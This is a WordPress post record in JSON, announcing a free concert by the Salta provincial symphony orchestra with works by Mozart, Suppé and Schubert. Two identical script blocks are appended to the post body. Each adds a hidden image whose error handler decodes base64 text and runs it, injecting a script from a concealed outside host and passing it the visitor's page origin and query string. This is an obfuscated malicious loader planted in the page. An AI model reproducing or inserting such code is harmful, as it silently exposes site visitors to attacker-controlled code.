{"id":4298,"date":"2024-08-13T10:46:04","date_gmt":"2024-08-13T13:46:04","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4298"},"modified":"2025-08-13T23:50:50","modified_gmt":"2025-08-14T02:50:50","slug":"la-orquesta-de-la-provincia-se-prepara-para-su-presentacion-en-el-alejandro-i","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4298","title":{"rendered":"La Orquesta de la Provincia se prepara para su presentaci\u00f3n en el Alejandro I"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-32ad93275902529ba227e9c81ecdb7d5\" style=\"background-color:#5d5f60\"><em>En el marco del ciclo Otros Escenarios, ma\u00f1ana mi\u00e9rcoles 14 de agosto a las 21 horas se presentar\u00e1 el cuerpo mayor de m\u00fasica con entrada libre y gratuita. Mozart, Supp\u00e9 y Schubert fueron los compositores seleccionados para armonizar la velada<\/em><\/h4>\n\n\n\n<p>El Instituto de M\u00fasica y Danza de la Provincia y la&nbsp;<strong>Orquesta Sinf\u00f3nica de Salta&nbsp;<\/strong>en articulaci\u00f3n con la Administraci\u00f3n del Alejandro I invitan al pr\u00f3ximo concierto ma\u00f1ana&nbsp;14 de agosto a las 21 hs en Balcarce 252 con entrada libre y gratuita hasta agotar aforo.<\/p>\n\n\n\n<p>El ciclo de presentaciones \u00abOtros Escenarios\u00bb del Instituto de M\u00fasica y Danza de la Provincia tiene por objetivo llevar la m\u00fasica cl\u00e1sica a diversos espacios de la ciudad, ofreciendo una experiencia distinta y accesible para todos los amantes de la m\u00fasica.<\/p>\n\n\n\n<p>El programa de la noche incluir\u00e1 obras maestras de los compositores Wolfgang A. Mozart, Franz Von Supp\u00e9 y Franz Schubert. La velada comprender\u00e1 la interpretaci\u00f3n de la Sinfon\u00eda Nro. 31, \u00abPar\u00eds\u00bb, de Mozart, una obra vibrante y alegre que refleja la influencia de la ciudad francesa en el joven compositor. Mozart, nacido en 1756, es reconocido como uno de los m\u00e1s grandes genios de la m\u00fasica cl\u00e1sica, con un legado que abarca m\u00e1s de 600 obras en todos los g\u00e9neros musicales de su \u00e9poca.<\/p>\n\n\n\n<p>Asimismo, se interpretar\u00e1 la Obertura de la Caballer\u00eda Ligera de Franz von Suppe. El Cuarteto para cuerdas \u00abLa muerte y la doncella\u00bb de Schubert, en una adaptaci\u00f3n para orquesta realizada por Gustav Mahler, ofrecer\u00e1 a los presentes una versi\u00f3n enriquecida de Schubert. El compositor nacido en 1797, es famoso por su lirismo mel\u00f3dico y sus contribuciones a la m\u00fasica de c\u00e1mara y lied, a pesar de su vida breve y su carrera truncada a los 31 a\u00f1os.<\/p>\n\n\n\n<p>El concierto estar\u00e1 bajo la batuta de su director titular Jorge Mario Uribe. La apertura de puertas esta prevista para las 20:45 hs en el Hotel Alejandro I, Balcarce 252. La entrada es libre y gratuita, permitiendo as\u00ed el acceso de un amplio p\u00fablico a este evento cultural hasta agotar la capacidad del sal\u00f3n.<\/p>\n\n\n\n<p>Esta iniciativa de la Secretar\u00eda de Cultura, a trav\u00e9s de la Orquesta Sinf\u00f3nica de Salta promueve la cultura y la m\u00fasica cl\u00e1sica, como as\u00ed tambi\u00e9n la articulaci\u00f3n entre el sector p\u00fablico y privado para llevar estas actividades al p\u00fablico salte\u00f1o.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del ciclo Otros Escenarios, ma\u00f1ana mi\u00e9rcoles 14 de agosto a las 21 horas se presentar\u00e1 el cuerpo mayor de m\u00fasica con entrada libre y gratuita. Mozart, Supp\u00e9 y Schubert fueron los compositores seleccionados para armonizar la velada El Instituto de M\u00fasica y Danza de la Provincia y la&nbsp;Orquesta Sinf\u00f3nica de Salta&nbsp;en articulaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4299,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-4298","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4298"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4298"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4298\/revisions"}],"predecessor-version":[{"id":6713,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4298\/revisions\/6713"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4299"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4298"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4298"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4298"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}